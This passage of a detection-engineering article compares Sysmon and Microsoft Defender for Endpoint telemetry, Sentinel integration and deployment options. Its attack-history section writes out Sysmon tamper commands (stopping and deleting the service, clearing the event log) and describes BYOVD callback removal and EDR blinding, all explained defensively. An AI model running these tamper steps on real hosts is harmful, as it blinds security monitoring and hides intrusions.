console.log(JSON.stringify(hits, null, 2)); // Expected output: one hit on D1 (WINWORD-spawned powershell to public IP); // D2 is filtered out (RemoteIP is RFC 1918 private). `}

The semantic of the KQL is the semantic of the JavaScript: a relational join on a composite key, filtered by a time-window predicate and a network-class predicate. The KQL query is shorter and faster; the JavaScript is what the join is actually doing. Once a reader internalizes this pattern, the rest of the Advanced Hunting surface unfolds from it -- every other detection in the field is a variant of "join Device* table A to Device* table B on (DeviceId, InitiatingProcessId), filter by time and content."Advanced Hunting per-query quotas are 100,000 rows of returned data and 10 minutes of execution time per call [@advanced-hunting-overview]. The practical workaround for queries that exceed either limit is to pre-filter with a tighter time window (Timestamp > ago(1h) instead of ago(24h)), or to push the heavy aggregation into a Sentinel scheduled analytics rule that runs every hour and materializes the result table for further hunting.

The same query, the same columns, the same six tables surface in two different places: the Defender XDR portal itself (at security.microsoft.com legacy or defender.microsoft.com current), and inside Microsoft Sentinel via the Defender XDR connector. The two surfaces are not the same.

9. The Microsoft Sentinel Integration Model

The same KQL query runs in two different places, but the economics of the two places are not the same, and that distinction is the one that catches detection engineers off guard. In-portal Advanced Hunting and Microsoft Sentinel both expose the same Device* tables. They do not expose them with the same retention, the same join surface, or the same cost.

The connector contract

Microsoft Sentinel's Defender XDR connector (the post-Ignite-2023 successor to the legacy Microsoft 365 Defender connector) streams Microsoft Defender XDR incidents, alerts, and Advanced Hunting events into Sentinel's Log Analytics workspace. Microsoft Learn's verbatim definition is: "The Defender XDR connector allows you to stream all Microsoft Defender XDR incidents, alerts, and advanced hunting events into Microsoft Sentinel and keeps incidents synchronized between both portals" [@sentinel-xdr-connector]. The connector exposes per-table streaming, meaning the operator picks which Device* tables to bring into Sentinel and pays per-GB ingestion only on those tables.

The connector also handles the legacy-connector transition: when enabled, "any Microsoft Defender components' connectors that were previously connected are automatically disconnected in the background" [@sentinel-xdr-connector]. If a tenant was using the legacy Microsoft Defender ATP connector or per-product Defender connectors, those get retired when the unified Defender XDR connector takes over. This is the cleanup detail that catches teams off guard during the migration -- they expect both connectors to coexist for the transition window, and they do not.

Three asymmetries

The in-portal Advanced Hunting surface and the Sentinel surface differ on three practitioner-level axes:

Dimension	In-portal Advanced Hunting	Sentinel + Defender XDR connector
Retention	30 days of raw data per query [@advanced-hunting-overview]	Configurable per-workspace, up to 12 years archive [@sentinel-xdr-connector][@ms-log-analytics-archive]
Query surface	Six core `Device*` tables plus cross-domain `AlertInfo` / `EmailEvents` / `IdentityLogonEvents` / `CloudAppEvents`	Six core `Device*` tables (per-table selection) plus the entire Log Analytics workspace -- third-party logs, custom tables, ASIM-normalized data
Cost	Included with MDE Plan 2 license	Per-GB Sentinel ingestion (current GA tier) plus per-GB archive
Detection authoring	Custom detection rules; in-portal advanced-hunting-to-alert promotion	Scheduled analytics rules; SOAR playbook triggers; automation rules
Cross-tenant hunting	Tenant-bound only	Possible via Lighthouse / Sentinel Workspaces aggregation
Live response triggers	In-portal action surface	Via Logic Apps / Defender API connector

The in-portal economics are predictable: the queries are included with the license, the retention is uniform at thirty days, the surface is the six tables plus the cross-domain entity catalogue. The Sentinel economics are flexible but billable: longer retention, more table coverage, more automation, all of which carry per-GB ingestion charges. The choice is operational: which queries does the team need to run on data older than thirty days?

When each surface is the right one

For the SOC-analyst-driven, real-time threat-hunting workflow that §1 modeled with Maya -- thirty days back, six tables, cross-domain join into AlertInfo -- the in-portal Advanced Hunting surface is the obvious fit. For the longer-retention, multi-source, automated-analytic-rule workflow -- where detection engineers want a scheduled rule that joins DeviceProcessEvents to a third-party identity log on a normalized schema -- the Sentinel surface is the obvious fit.

The two surfaces are not exclusive. The most-cited operational pattern in 2026 is to keep the in-portal surface as the SOC-analyst hunting console (retention 30 days, no cost) and to run the Defender XDR connector into Sentinel for the subset of tables the team needs longer retention or analytics-rule scheduling on. Per-table selection keeps the per-GB ingestion bill predictable.The Sentinel connector preserves table names but namespaces them inside the Log Analytics workspace; DeviceProcessEvents in Sentinel is the same shape as DeviceProcessEvents in the Defender XDR portal, and most queries port between the two surfaces unchanged. Some columns are renamed at the connector boundary -- the most common gotcha is the time-zone and timestamp representation -- but the join semantics and the cross-walk to Sysmon EIDs do not change.

The portal-URL transition

A small operational detail worth naming: the Defender XDR portal lives at both security.microsoft.com (legacy, still functional) and defender.microsoft.com (current). The new URL was announced as part of the Microsoft 365 Defender to Microsoft Defender XDR rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog]. The rebrand changed neither the KQL substrate nor the Device* schema; queries written against the legacy URL behave identically against the new URL. This is the disambiguation §1 alluded to in its layer-7 description: the same KQL query, the same tables, against either URL.

Two query surfaces, six tables, twenty-nine Sysmon EIDs, and one operational question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone? That is §10.

10. Sysmon Plus MDE: Three Coexistence Patterns

This is the operational question of the article. The community has converged on three answers, and one of them is wrong for almost every MDE-licensed environment. The three options, in order of increasing complexity and -- in most enterprise contexts -- decreasing prevalence:

Option A: Sysmon only, no MDE

Used in air-gapped environments, unlicensed environments, and regulatory contexts that prohibit cloud-side telemetry. Sysmon on its own produces a complete event stream into the local Windows event log, which a downstream collector (Windows Event Forwarding to a central collector, Splunk's Universal Forwarder, Wazuh's Windows agent, the Elastic Endpoint integration) picks up and ships to a customer-controlled SIEM. The trade-off: no cross-tenant correlation, no cloud-side threat-intelligence join, no EtwTi (kernel security ETW provider) consumption, no Microsoft-authored detection rules. The customer owns every rule themselves.

This is the right answer in a small set of contexts and the wrong answer in the licensed-enterprise context where MDE is already deployed.

Option B: MDE only, no Sysmon

The Microsoft-recommended baseline for licensed environments. MDE's Device* schema covers the high-value Sysmon EID surface -- 1, 3, 7, 10, 11, 12-14 -- at full or near-full fidelity, and MDE adds the layers Sysmon does not have: cloud-side correlation, cross-domain joins (email, identity, cloud apps), Microsoft-authored built-in detection rules with continuous tuning, the AlertInfo/AlertEvidence evidence graph, and the SOC-actionable surface (device isolation, live response, automated investigation) [@mde-ms-learn][@ms-mitre-2024-blog].

For most MDE-Plan-2-licensed organizations without a mature detection-engineering team, Option B is the right baseline. The trade-off is that the truncations and omissions in the Device* schema -- the ProcessAccess GrantedAccess mask Sysmon EID 10 surfaces verbatim that MDE drops, the WMI consumer expressions Sysmon EIDs 19-21 capture that MDE does not surface, the RawAccessRead and PipeEvent classes Sysmon captures that MDE omits entirely -- are not available to the team's custom hunting queries. For an organization without the engineering capacity to build hunting rules on those verbose surfaces, this is rarely a binding constraint.

Option C: MDE plus tuned Sysmon (Hartong's MDE-augment)

The detection-engineering-community pattern. Run MDE as the primary EDR. Run Sysmon alongside it with olafhartong/sysmon-modular's sysmonconfig-mde-augment.xml configuration, whose explicit README design intent is "intended to augment the information and have as little overlap as possible" with MDE [@github-hartong-modular]. The augment config drops the EIDs MDE covers cleanly (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8 with full SourceImage, 9 RawAccessRead, 10 with full GrantedAccess mask, 15 FileCreateStreamHash, 17-18 PipeEvent, 19-21 WmiEvent, 23 with archive variant on narrowly-scoped paths). The result is a Sysmon event-log stream that is purpose-built to complement MDE's Kusto stream, not duplicate it.

Key idea: If you are an MDE-licensed shop with a detection-engineering team and you are not running Hartong's sysmonconfig-mde-augment.xml, you are paying for two EDRs and getting the coverage of one. The augment config was purpose-built to make Sysmon's verbose-field surface complementary to MDE's cloud-correlation surface, not a duplicate. Standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds: double telemetry volume, double licensing exposure, and no incremental detection coverage.

Cost and operational complexity

The three options have different operational profiles. The summary table:

Pattern	License posture	Telemetry volume	Operational complexity	Best used for
A. Sysmon only	None (free)	Medium (depends on config)	Low (one product, one config)	Air-gapped, regulatory-no-cloud, unlicensed
B. MDE only	MDE Plan 1 or Plan 2	Cloud-controlled (no per-host volume bill)	Low (one product, Microsoft-managed)	Most MDE-licensed orgs without detection-engineering team
C. MDE + Hartong augment	MDE Plan 2 + WEF or SIEM	High on Sysmon side (verbose EIDs); low on MDE side	High (two products, modular config, WEF or SIEM forwarder)	Detection-engineering-mature SOCs

A small operational caution: standalone Sysmon next to MDE without the augment-specific exclusions is the worst of three worlds. The drivers coexist fine at different Filter Manager altitudes, but the event log and downstream collector now carry every Sysmon EID the default config emits plus everything MDE collects on the cloud side. The double-pay problem the KeyIdea calls out is not theoretical; it shows up the first month a SOC team forgets to swap the default sysmonconfig.xml for sysmonconfig-mde-augment.xml.

The Hartong-augment-with-MDE pattern carries a second cost: the ETW manifest-provider session cap. Windows allows up to eight trace sessions to enable and receive events from the same manifest-based provider [@ms-etw-limits]; the EtwTi security provider, Microsoft Defender Antivirus auto-start sessions, and any WPR sessions a developer might spin up all compete for that shared pool. Adding Sysmon's session takes one. On a host with a third-party EDR that already consumes several sessions against the same provider, this can cause silent telemetry loss. Audit logman query -ets regularly.

The volume math

For sizing, assume a typical Windows endpoint generates roughly 20,000 process-create events per day under steady state (developer workstations are in this range; server volumes are higher; air-gapped jump boxes are lower) [@github-tsale-edr-telem]. The Hartong-augment config drops the top three high-volume EIDs (1 ProcessCreate, 7 ImageLoad, 11 FileCreate) that MDE already collects, retaining only the verbose surfaces. That cuts Sysmon volume by roughly 70 to 85 percent relative to a default-config Sysmon deployment, leaving only the verbose-EID stream (8, 10, 17-18, 19-21) MDE does not surface.

This is the operational answer to the question. For organisations with detection-engineering teams, Option C is the default. For organisations without, Option B is the default. Option A is correct in a narrow set of contexts and should be picked on purpose. The next two sections turn from the layered architecture to the layered attack surface, because every defense has an attacker.

11. The Attack Tradition: Telemetry Suppression on Both Halves of the Pipeline

If you run an EDR on a host, you have made a bet that the EDR can survive contact with an attacker who knows it is there. The history of that bet -- on both halves of the pipeline -- is a chronological story with named techniques and named CVEs. Twelve years of attack tradition reduce to a small number of attack classes plus the structural defenses that closed each one.

Sysmon-side attacks, in order

The earliest tampering technique for Sysmon was the most obvious: stop the driver. Until Sysmon v15 in June 2023, the Sysmon service was a normal Windows service, and a SYSTEM-privilege attacker had several easy options:

sc stop sysmon and sc delete sysmon to unload SysmonDrv.sys.
Rewrite the minifilter altitude so Sysmon loads after a tamper hook.
wevtutil cl Microsoft-Windows-Sysmon/Operational to erase history.
Rewrite SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters to re-program Sysmon's filter without restarting it.
Register a Windows event-channel ACL change to silence Microsoft-Windows-Sysmon.

A small family of community-published tools automated this class. The structural defense, before v15, was discipline: keep SYSTEM out of attacker hands.

The June 2023 v15 protected-process gate is the structural response to this entire class. Microsoft Learn states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. A SYSTEM-privilege attacker can no longer OpenProcess(PROCESS_TERMINATE) against Sysmon.exe, inject code into the service's address space, or attach a user-mode debugger. The class is not closed -- a kernel primitive still works, and a BYOVD chain that can write _EPROCESS.Protection defeats the gate -- but the bar moves from "a wevtutil command in a PowerShell window" to "a kernel exploit primitive."

MDE-side attacks, in order

The MDE-side attack tradition starts at the Antimalware-PPL boundary on MsSense.exe. The FalconForce 2022 work this article has already cited multiple times is the dispositive primary [@falconforce-2022]. The verbatim TL;DR -- describing how raising dbgsrv.exe to WinTcb PPL lets researchers debug MDE and capture cloud-bound payloads, which surfaced a missing-authorization vulnerability allowing spoofed telemetry to any M365 tenant -- landed earlier as the §6 PullQuote and is the framing this section builds on.

The technique used a PPLKiller-class BYOVD chain to raise dbgsrv.exe to WinTcb PPL, attach to MsSense.exe, and capture plaintext payloads via SspiCli!EncryptMessage instrumentation. The vulnerability that work disclosed, CVE-2022-23278, was patched on March 8, 2022 [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. That patch closed one missing-authorization gap in the cloud-side trust model. It did not close the class.

The InfoGuard Labs 2025 follow-up [@infoguard-2025] demonstrated that the broader class is still open. The technique they used was different -- in-memory patching of CRYPT32!CertVerifyCertificateChainPolicy to disable certificate-pinning validation, rather than PPL-elevated debugging -- but the vulnerability they surfaced is the same class: cloud endpoints (/edr/commands/cnc and /senseir/v1/actions/) that do not properly validate authentication tokens on traffic claiming to originate from the endpoint. As §7 documented, the MSRC disposition was low severity, no fix committed -- the operational consequence is that the spoofed-telemetry trust pattern that produced CVE-2022-23278 in 2022 is, three years later, still exploitable along a parallel surface.

The broader attack class -- ETW Threat Intelligence (EtwTi) blinding -- has been studied independently of MDE. The structural answer in 2026 is HVCI plus VBL plus Antimalware-PPL plus ELAM (the four-component hardening stack). On a fully-hardened endpoint, the user-mode tamper surface that defined the 2014-to-2020 era of EDR-blinding tradecraft is largely closed; the residual attack surface is kernel-mode adversary primitives. That is the structural ceiling §12 picks up.

Cross-pipeline attacks

Some attacks affect both halves of the pipeline simultaneously. The most-cited is BYOVD-driven kernel-callback removal: a Bring-Your-Own-Vulnerable-Driver chain loads a Microsoft-signed but vulnerable driver, exploits a known CVE in the driver, and from kernel context calls PsSetCreateProcessNotifyRoutineEx with a Remove = TRUE flag against the EDR sensor's registered callbacks, effectively unhooking both Sysmon and MDE at the kernel-callback layer. The structural defense Microsoft shipped in response is the Microsoft Vulnerable Driver Blocklist with HVCI enforcement, which has been on by default since Windows 11 22H2 [@ms-driver-blocklist].

A second cross-pipeline attack is direct-syscall bypass of user-mode hook libraries -- but this attack is mostly a relic from the 2010s when EDR vendors relied on ntdll.dll user-mode IAT hooks; modern Sysmon and MDE neither register nor depend on user-mode hooks for the kernel-callback events. Direct-syscall malware that bypasses the user-mode hooks of a third-party EDR will still produce a Sysmon EID 1 and an MDE DeviceProcessEvents row, because the kernel-callback fires whether or not the malware called NtCreateUserProcess via ntdll.dll.

The attack-surface lattice

flowchart TD A1["Sysmon-side: sc stop, wevtutil clear, registry altitude swap"] --> D1[Sysmon v15 protected-process gate] A2["MDE-side: PPLKiller + dbgsrv WinTcb to attach MsSense"] --> D2["Antimalware-PPL on MsSense.exe"] A3["Cloud-side: CVE-2022-23278 spoofed cloud telemetry"] --> D3["MSRC patch March 8 2022"] A4["Cloud-side: InfoGuard 2025 cert-pinning bypass + missing auth"] --> O4["OPEN: 'low severity, no fix committed'"] A5["Cross-pipeline: BYOVD kernel-callback unhook"] --> D5["HVCI + Vulnerable Driver Blocklist (Win11 22H2+)"] D1 --> R["Residual: kernel-mode adversary primitive that defeats HVCI + VBL"] D2 --> R D5 --> R D3 --> R O4 -.unclosed.-> R

The shape of the lattice is the shape of the field's hardening: every user-mode attack class has a structural defense, and the structural defenses converge on a single residual -- the kernel-mode adversary primitive that defeats HVCI plus the Vulnerable Driver Blocklist. On the cloud side, the InfoGuard 2025 finding is the unresolved item -- the same trust pattern that produced CVE-2022-23278 in 2022 produced a different cluster of missing-authorization bugs three years later. The attack-defense arc is still moving, and the two-sided nature of the pipeline (host + cloud) is why.

Every attack surface has a structural defense. But every defense has a horizon. What is outside the horizon?

12. Theoretical Limits: What the Pipeline Cannot See

Sysmon and Microsoft Defender for Endpoint are observation pipelines, not enforcement layers. That statement contains four structural ceilings the engineering cannot lift. These are not bugs to be fixed; they are properties of the architecture that follow from the choice of where the pipeline collects.

Ceiling 1: The pre-driver-load horizon

Both Sysmon's SysmonDrv.sys and Defender for Endpoint's WdBoot.sys are kernel drivers, but they sit at different points in the boot order. WdBoot.sys is ELAM-signed and loads before any non-ELAM driver, which lets it classify subsequent boot-start drivers as Good, Bad, or Unknown for the kernel's load decision. (Measured Boot separately hashes WdBoot.sys along with the bootloader and kernel into TPM PCRs; that integrity-attestation channel is a sibling feature, not ELAM's own job.) SysmonDrv.sys is BootStart-ordered but not ELAM-signed -- it loads early, but not first.

Events that happen before the EDR driver's DriverEntry runs are not observable by that driver. For Sysmon, that means rootkit-class malware that loads inside the early Windows boot path (UEFI bootkits, boot-record manipulation, very-early kernel modifications) is invisible until after Sysmon catches up. For MDE, the ELAM-signed WdBoot.sys closes most of this window for non-ELAM drivers; the residual is anything that runs even earlier -- UEFI-firmware-resident malware, hardware-implant attacks, the very narrow class that targets the pre-ELAM trust boundary itself. The Measured Boot plus Secure Boot stack (covered in adjacent articles in this series) is what observes the pre-ELAM region. EDR's reach does not extend below the ELAM line.

Ceiling 2: The observation-vs-enforcement latency gap

Sysmon's kernel-callback to event-log latency is sub-millisecond. The driver runs the rule engine, decides to emit, and writes through the ETW publisher to the Sysmon service. The service writes to the event log. The total path is microseconds in the best case, milliseconds under load.

MDE's end-to-end latency to a queryable Kusto row is seconds to tens of seconds. The endpoint side takes microseconds; the TLS hop to regional ingest takes the dominant fraction of a second; the Kusto write and per-tenant indexing takes the rest. Microsoft's own Advanced Hunting documentation phrases the freshness contract carefully: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, longer under load, and indefinite when the endpoint cannot reach the cloud.

Any payload that completes its work inside the observation window has executed before the SIEM rule could fire. A mimikatz.exe invocation that dumps LSA secrets in three milliseconds, exfiltrates them over a covert DNS channel in 800 milliseconds, and exits in another two milliseconds has produced a complete attack chain before MDE's event has reached Kusto, let alone before the Maya-class analyst has glanced at her console. The hybrid responses that blur this boundary -- Sysmon v14's FileBlockExecutable (EID 27), MDE's ASR rules and Network Protection -- are kernel-callback-time decisions, not SIEM-rule-time decisions; they run inside the few-microsecond window the driver itself owns, and they are constrained by the rule logic baked into the host configuration rather than by the live correlation logic of the cloud-side detection engine.

Ceiling 3: MDE schema truncation versus Sysmon manifest

This is the ceiling §8 quantified column-by-column. The Device* tables surface a normalized, mostly-complete cross-walk of Sysmon's manifest -- but mostly-complete is not the same as complete. The ProcessAccess GrantedAccess mask is the most-cited example: Sysmon EID 10 captures the full 32-bit PROCESS_ACCESS_MASK (which discriminates between PROCESS_QUERY_INFORMATION, PROCESS_VM_READ, PROCESS_CREATE_THREAD, and so on -- the canonical malicious patterns are visible in this mask), while MDE's DeviceEvents OpenProcessApiCall ActionType collapses the mask into a coarser categorization. The WmiEvent consumer expressions Sysmon EIDs 19-21 capture verbatim -- which are how WMI-based persistence is detected -- are not surfaced in the Device* schema at all. RawAccessRead (EID 9, the canonical disk-level credential-theft observable) is omitted. PipeEvent (EIDs 17-18) is omitted.

Hartong's sysmonconfig-mde-augment.xml exists precisely because of this asymmetry. The augment config is a community-curated artifact whose purpose is to fill the schema-truncation gap. The cost: a second telemetry stream on the host. The benefit: detection-engineering visibility into the verbose-EID surface MDE drops.

Ceiling 4: The kernel-mode adversary primitive

A ring-0 attacker with a working kernel primitive -- a memory-write capability into the kernel data structures, typically delivered via BYOVD against a vulnerable signed driver -- can defeat the pipeline as a consequence of defeating the structural defenses that protect it. Specifically:

Direct call to PsSetCreateProcessNotifyRoutineEx with Remove = TRUE unregisters the EDR sensor's callback, after which CreateProcess events on that host produce no observable.
A patch to the _EPROCESS.Protection field of MsSense.exe or Sysmon.exe strips the Antimalware-PPL gate, after which user-mode attacks against the service work again.
A direct write into the EtwTi provider's keyword mask zero-pages the security-event-emission surface, after which the kernel-side EtwTi consumer (which several EDRs subscribe to) sees no events even when the underlying behaviour fired.

The "Tampering with Windows Event Tracing" research published by Palantir in 2018 (Matt Graeber's canonical writeup) and the follow-on EtwTi-blinding tradition is the published primary for this attack class [@palantir-etw-tampering-2018]. The structural defenses are HVCI plus VBL plus Antimalware-PPL plus ELAM. But the four-component hardening stack does not prevent a kernel-mode adversary primitive from defeating the EDR; it only raises the bar to needing a kernel-mode adversary primitive.

Observation requires execution overhead, and execution requires the observer to live in the same trust domain as the observed. A kernel-mode observer (Sysmon, MDE) lives in the same kernel trust domain as the kernel-mode attacker; a hypervisor-rooted observer (`EtwTi` running under Virtualization-Based Security) shifts the trust boundary up one level, but does not eliminate it -- the observer-in-VBS is still subject to attacks on the hypervisor itself. There is no architectural place to put the observer that is strictly outside the attacker's reach unless the observer is in different hardware, which is what hardware-rooted Root-of-Trust attestations attempt and what an Anti-Tamper Service Provider (ATSP) is being defined for. EDR sensors will always be co-resident with the adversary at *some* trust boundary. The ceiling is structural.

Four ceilings, four sets of open questions. What is the field working on right now?

13. Open Problems and Active Work

Some questions in this article have no answer in 2026. Five of them are where the field will move next.

The MDE kernel-callback inventory

As §6's aha-moment Callout established, Microsoft has not published a kernel-callback inventory for the MDE EDR sensor, which is the structural reason Hartong's sysmonconfig-mde-augment.xml exists as a community-curated artifact rather than a Microsoft-published reference. What §13 adds is the empirical scaffolding the community uses in the absence of that inventory: the MITRE Engenuity Round 6 (2024) evaluation results [@ms-mitre-2024-blog] plus the Shen et al. whole-graph re-analysis [@arxiv-shen-2024] are the closest published evidence of which MDE detection paths produced an alert during a known emulated technique. Neither covers an end-to-end kernel-callback enumeration comparable to Sysmon's manifest -- they cover outputs (alerts produced) rather than mechanisms (callbacks registered). Closing this gap would require either Microsoft to publish a per-ActionType-to-per-kernel-callback cross-walk for the Device* schema, or the community to fund and publish a reverse-engineered inventory that goes meaningfully past the FalconForce 2022 and InfoGuard 2025 slices. As of 2026, neither has happened.

Defender XDR built-in detection rule logic

The AlertInfo and AlertEvidence table schemas are published; the underlying rule logic that produces alerts in these tables is not. Microsoft ships "Microsoft-authored detection rules" as part of Defender XDR Plan 2, and the rules update continuously without an obvious public changelog. The community workaround is to subscribe to the MITRE ATT&CK evaluation rounds (the most recent being Round 6 in 2024 [@ms-mitre-2024-blog][@arxiv-shen-2024]) and infer rule coverage from per-technique detection scores, but this is indirect and lossy. A published rule-logic catalogue would let detection-engineering teams reason about which custom rules are duplicates of Microsoft's authored content and which fill genuine gaps.

Cross-tenant hunting and data sovereignty

MSSPs (managed-security service providers) routinely need to hunt across multiple customer tenants for shared-IOC observations. Microsoft's official multi-tenant story is Microsoft Defender XDR Multitenant Management (in GA) plus Azure Lighthouse for cross-tenant Sentinel access. Both are functional and both are documented at the operational level. The deeper question -- what is the GDPR/HIPAA/FedRAMP framework around hunting an IOC observed in Tenant A against telemetry held in Tenant B's regional Kusto cluster? -- is unsettled. The data-residency commitments Microsoft makes per region [@ms-server-endpoints-learn] do not directly answer the cross-tenant-hunt question. Vendor and customer guidance is still maturing.

A Microsoft-published reference MDE-augmentation Sysmon config

Hartong's config is the community answer to the question "what Sysmon EIDs should I emit on a host that already has MDE?" There is no Microsoft-published reference equivalent. This is the most surgical near-term improvement Microsoft could make. Publishing such a config -- even as a starting-point template, not a binding recommendation -- would compress an entire detection-engineering conversation into a single endorsed artifact. The political reason it has not happened is partly that Microsoft does not officially recommend running Sysmon alongside MDE; the operational reality is that detection-engineering-mature shops do anyway.

Cross-platform parity

Sysmon for Linux (microsoft/SysmonForLinux, created October 28, 2020 and publicly announced in October 2021) ships an eBPF-based implementation of the same XML schema and emits to syslog [@github-sysmon-linux]. It is a substantial subset of the Windows manifest -- process create, file write, network connect, image load, raw access read -- with the cross-OS shared XML rule grammar going for it, so a detection-engineering team can write one Sigma-aligned rule and run it against both Windows and Linux endpoints with minor token substitutions. Full parity between the Windows kernel-callback Sysmon and the Linux eBPF Sysmon is not the design intent; the Linux port intentionally captures only the EIDs that map cleanly onto eBPF observables. BTFHub plus SysinternalsEBPF (the in-tree CO-RE infrastructure the Linux port uses) make per-kernel-version deployments tractable, but the field has not yet converged on a single canonical Linux config the way it converged on SwiftOnSecurity for Windows.

These five open problems are where the field will move in the next five years. In the meantime, what does the analyst do on Monday morning?

14. Seven Things to Do Monday Morning

Everything above has been background. Here is the operational checklist. Each step is anchored to a primary citation. Walk all seven on a single non-production host before fleet rollout; the ninety-second triage walk from §1 is best learned by reproducing it once on your own tenant.

1. Verify the MDE sensor service is healthy

Run as Administrator on the endpoint:

sc query sense

A healthy result shows STATE: 4 RUNNING and WIN32_EXIT_CODE: 0. If the result is STATE: 1 STOPPED or the service is missing entirely, consult the WDATPOnboarding event source in the Application event log for events 5, 10, 15, 30, 35, 40, 65, and 70 -- each has a documented resolution procedure [@sense-troubleshoot]. On Windows Server 2019, 2022, 2025, or Azure Stack HCI 23H2 or later, also verify the Feature on Demand is installed:

DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~

The result should show State : Installed and Version : 10.x.x.x. If State : NotPresent, install the FoD before proceeding.

2. Open Advanced Hunting and run the §8 query

Navigate to defender.microsoft.com (or the legacy security.microsoft.com), expand Hunting > Advanced hunting, paste the §8 KQL query, and run it [@advanced-hunting-overview]. On a fresh tenant the query may return zero rows -- that is the correct result for a healthy environment. Tighten the time window if it is slow (Timestamp > ago(1h) instead of ago(24h)) until the query returns within ten seconds. The point of this step is to confirm the read surface is reachable and that the user has Hunter (or higher) RBAC permission on the tenant.

3. If licensed for Sentinel, install the Defender XDR connector

In the Microsoft Sentinel workspace, navigate to Data connectors, choose Microsoft Defender XDR, and configure per-table streaming [@sentinel-xdr-connector]. Pick the tables your team needs longer retention or analytics-rule scheduling on; leave the others to in-portal Advanced Hunting. Be aware that enabling the connector "automatically disconnects" any legacy Microsoft Defender component connectors during enablement; this is the cleanup detail to plan for during migration windows [@sentinel-xdr-connector].

4. If deploying Sysmon alongside MDE, start from the augment config

Clone olafhartong/sysmon-modular, build the sysmonconfig-mde-augment.xml variant, and deploy with:

Sysmon64.exe -accepteula -i sysmonconfig-mde-augment.xml

Verify the active configuration with Sysmon64.exe -c and confirm the rule count matches the augment config's expected output [@github-hartong-modular].

5. If deploying Sysmon standalone, start from NextronSystems or modular default

For air-gapped or unlicensed environments, clone NextronSystems/sysmon-config (the post-2021-rename successor to Neo23x0/sysmon-config) and deploy sysmonconfig.xml or, for the blocking-rule variant, sysmonconfig-export-block.xml [@github-neo23x0][@github-nextronsystems-meta]. Alternatively, olafhartong/sysmon-modular's default sysmonconfig.xml (built from the modular library) is the right choice if you want fine-grained per-technique tuning later [@github-hartong-modular].

6. Verify Sysmon v15.2 or later is running

Sysmon64.exe -c

The output's header line should show the binary version. Anything v15.x or later has the protected-process gate enabled [@sysmon-ms-learn][@bleepingcomputer-sysmon15]. Anything older is trivially blindable by a SYSTEM-privilege attacker and is the single biggest deployment-hygiene risk in the Sysmon population today.

7. Audit the MDE onboarding registry hives

Compare the live registry values to the expected onboarding state:

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
reg query "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Unexpected changes -- particularly a change to the onboarding OrgId or to the policy-controlled Disabled value -- are an indicator that the tenant or device has been re-targeted, possibly by an attacker who obtained admin-level access and is attempting to re-route the endpoint's telemetry to a different tenant or to disable the MDE sensor entirely [@sense-troubleshoot]. Set up a Sentinel detection rule on DeviceRegistryEvents with RegistryKey contains "Windows Advanced Threat Protection" to surface this class of tampering automatically.

Note: Walk steps 1 and 2 on a single non-production host before fleet rollout. The ninety-second-triage walk you saw in §1 is best learned by reproducing it once on your own tenant. The cost of getting steps 4-6 wrong (deploying the wrong Sysmon config on a high-volume server fleet) is hours of operational pain; the cost of doing them right on a single test host first is twenty minutes.

The MDE sensor service has not been onboarded on this host. Two common causes: (1) the endpoint is on a Windows Server SKU and the SENSE Feature on Demand has not been installed; run the DISM `Get-CapabilityInfo` check in step 1 to confirm. (2) The onboarding script (the `WindowsDefenderATPLocalOnboardingScript.cmd` or the equivalent Group Policy / Intune / SCCM artifact) has not been run on this host. The MDE settings page in the Defender XDR portal shows the per-device onboarding artifacts under **Settings > Endpoints > Onboarding** for download [@sense-troubleshoot].

The Defender XDR portal also exposes a device timeline view that surfaces a chronological event stream per device without requiring KQL. This is the right view for analysts who are still learning the schema; the KQL surface is the right view for repeatable hunts and detection-rule authoring.

Seven steps, one Monday. The rest of the questions are in the FAQ.

15. Frequently Asked Questions

Seven of the questions that come up every time this material is taught.

Yes on its output side; mostly no on its input side. Sysmon publishes its events through an ETW provider called `Microsoft-Windows-Sysmon`, which is how downstream collectors and the Windows Event Log service consume the data. On its *input* side, Sysmon is a kernel driver that collects via five different mechanisms -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load and driver load, `PsSetCreateThreadNotifyRoutineEx` for remote-thread creation, `ObRegisterCallbacks` for cross-process access, `CmRegisterCallbackEx` for registry, and Filter Manager minifilters for ordinary file system and NPFS named pipes. Two exceptions live on Sysmon's input side. The single kernel-ETW consumer is `Microsoft-Windows-DNS-Client` for EID 22 DNSEvent; the WmiEvent family (EIDs 19-21) is implemented in a consumer style against the WMI activity provider's user-mode tracing surface. Calling Sysmon "ETW-based" without that distinction is the most common architectural confusion in the field [@sysmon-ms-learn]. For most organizations licensed for MDE Plan 2 and without a mature detection-engineering team, yes -- MDE alone is the right baseline. For organizations with a detection-engineering team, the community pattern is to deploy MDE *plus* a tuned Sysmon configuration (specifically Olaf Hartong's `sysmonconfig-mde-augment.xml`) that fills the gaps where MDE's `Device*` schema truncates or omits fields that Sysmon's manifest captures verbatim -- the `ProcessAccess` GrantedAccess mask, the full WMI consumer expressions, RawAccessRead, the pipe events, and selected file-delete archival paths. The wrong answer for an MDE-licensed shop with a detection-engineering team is to do nothing on the Sysmon side; the second-wrong answer is to deploy *default* Sysmon alongside MDE, which produces double the telemetry volume for the coverage of one [@github-hartong-modular][@mde-ms-learn]. The five class-specific `Device*` tables (`DeviceProcessEvents`, `DeviceNetworkEvents`, `DeviceFileEvents`, `DeviceImageLoadEvents`, `DeviceRegistryEvents`) each map onto a single Sysmon EID family and present a normalized, per-class set of columns. `DeviceEvents` is the miscellaneous catch-all: AMSI scan results, exploit-protection events, Defender Antivirus operational events, Attack Surface Reduction rule fires, Network Protection blocks, OpenProcess API calls, and other MDE-specific telemetry surface here under different `ActionType` values. If a row's `ActionType` does not match what you expected, the row is probably in `DeviceEvents` rather than the table you searched first [@advanced-hunting-overview]. No. The historical root is 